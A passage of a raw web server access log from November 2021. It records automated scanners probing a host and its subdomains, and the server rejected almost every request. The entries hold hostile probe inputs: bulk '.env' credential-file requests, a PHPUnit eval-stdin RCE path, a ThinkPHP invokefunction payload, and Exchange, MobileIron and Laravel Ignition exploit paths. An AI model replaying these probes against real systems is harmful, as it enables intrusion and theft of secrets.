192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Nov/2021:18:04:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Nov/2021:18:04:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Nov/2021:18:16:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth.owa" [Client 170.130.55.44] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" "-" [23/Nov/2021:20:29:54 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:20:34:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.195.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:20:34:35 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:21:11:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:23:12:09 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.213.8] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:23:20:13 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.215.45] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:23:55:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Nov/2021:23:57:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.94.6] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Nov/2021:00:43:17 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 104.224.28.64] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:01:23:19 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:02:37:01 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.68] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Nov/2021:02:40:06 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:03:22:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Nov/2021:03:40:28 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [24/Nov/2021:04:38:16 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:05:47:49 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 34.86.35.31] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Nov/2021:05:48:33 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:06:39:13 +0000] 400 - - http localhost "-" [Client 212.102.34.222] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:06:42:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.65.224] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [24/Nov/2021:06:51:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [24/Nov/2021:06:54:08 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.63] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https game.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https my.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https login.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https v2.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https billing.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https dashboard.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https stg.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https pos.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https status.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https uat.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https alpha.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https erp.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https development.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https local.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https account.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https store.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https sandbox.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https shop.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https h5.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https lms.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https members.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https office.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https checkout.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https hr.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https dev2.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https backoffice.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https system.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https dev-api.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https akaunting.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https site.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https academy.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https builder.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https analytics.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https secure.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https accounts.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:03:57 +0000] 444 - GET https console.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:04:03 +0000] 444 - GET https invoice.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:04:03 +0000] 444 - GET https prod.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:04:03 +0000] 444 - GET https booking.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Nov/2021:07:24:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:07:46:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:07:47:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Nov/2021:08:34:50 +0000] 400 - - http localhost "-" [Client 87.251.75.40] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:08:42:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.67] [Length 0] [Gzip -] "-" "-" [24/Nov/2021:08:52:24 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:08:57:41 +0000] 444 - GET https 64.22.31.253 "/resolve?name=dnsscan.shadowserver.org&type=A" [Client 216.218.206.67] [Length 0] [Gzip -] "-" "-" [24/Nov/2021:09:13:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [24/Nov/2021:09:34:19 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:09:34:19 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:11:17:09 +0000] 400 - - https localhost "-" [Client 23.111.106.132] [Length 0] [Gzip -] "-" "-" [24/Nov/2021:12:05:35 +0000] 400 - - http localhost "-" [Client 94.232.40.134] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:13:17:32 +0000] 444 - GET https 64.22.31.253 "/sitecore/shell/ClientBin/Reporting/Report.ashx" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [24/Nov/2021:13:40:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Nov/2021:13:51:58 +0000] 400 - GET http localhost "/" [Client 168.167.134.1] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:15:42:39 +0000] 400 - GET http localhost "/" [Client 160.116.22.18] [Length 252] [Gzip -] "-" "-" [24/Nov/2021:15:42:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 160.116.22.18] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Nov/2021:15:42:45 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 160.116.22.18] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Nov/2021:15:42:45 +0000] 400 - GET http 64.22.31.253 "/robots.txt" [Client 160.116.22.18] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Nov/2021:15:42:47 +0000] 400 - GET http 64.22.31.253 "/.well-known/security.txt" [Client 160.116.22.18] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Nov/2021:16:16:10 +0000] 400 - - http localhost "-" [Client 94.232.40.135] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:18:04:35 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Nov/2021:18:04:35 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Nov/2021:18:04:35 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Nov/2021:18:04:35 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Nov/2021:18:04:35 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Nov/2021:18:04:35 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Nov/2021:19:26:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.236.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Nov/2021:20:13:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 51.158.109.3] [Length 0] [Gzip -] "-" "-" [24/Nov/2021:20:13:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 51.158.109.3] [Length 0] [Gzip -] "-" "-" [24/Nov/2021:20:21:20 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:20:31:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.195.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Nov/2021:20:35:22 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Nov/2021:20:36:42 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.204.149] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Nov/2021:20:48:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Nov/2021:20:52:38 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:22:07:21 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:23:01:31 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:23:02:34 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [24/Nov/2021:23:03:26 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [24/Nov/2021:23:13:13 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Nov/2021:23:28:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Nov/2021:23:37:24 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [25/Nov/2021:00:10:49 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.170] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Nov/2021:00:26:25 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:00:26:25 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:00:26:25 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:01:13:11 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:01:19:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:01:21:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Nov/2021:01:32:51 +0000] 444 - GET https 64.22.31.253 "/resolve?name=dnsscan.shadowserver.org&type=A" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:02:10:56 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:03:08:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:03:47:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:04:12:18 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:04:12:18 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:04:12:19 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:04:40:17 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:05:12:25 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:05:12:25 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:05:22:00 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 45.61.146.242] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [25/Nov/2021:05:31:23 +0000] 400 - GET https localhost "/" [Client 161.35.188.242] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:05:31:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 